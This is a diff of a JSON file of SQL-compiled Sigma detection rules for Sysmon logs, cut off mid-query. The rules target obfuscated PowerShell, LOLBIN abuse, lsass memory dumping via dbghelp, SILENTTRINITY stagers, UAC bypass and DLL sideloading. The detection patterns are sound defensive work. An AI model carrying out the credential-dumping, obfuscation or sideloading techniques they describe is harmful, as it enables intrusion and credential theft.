- "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + 
"Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files 
(x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": 
"b222df08-0e07-11eb-adc1-0242ac120002", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": 
"4fc0deee-0057-4998-ab31-d24e46e0aba4", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE 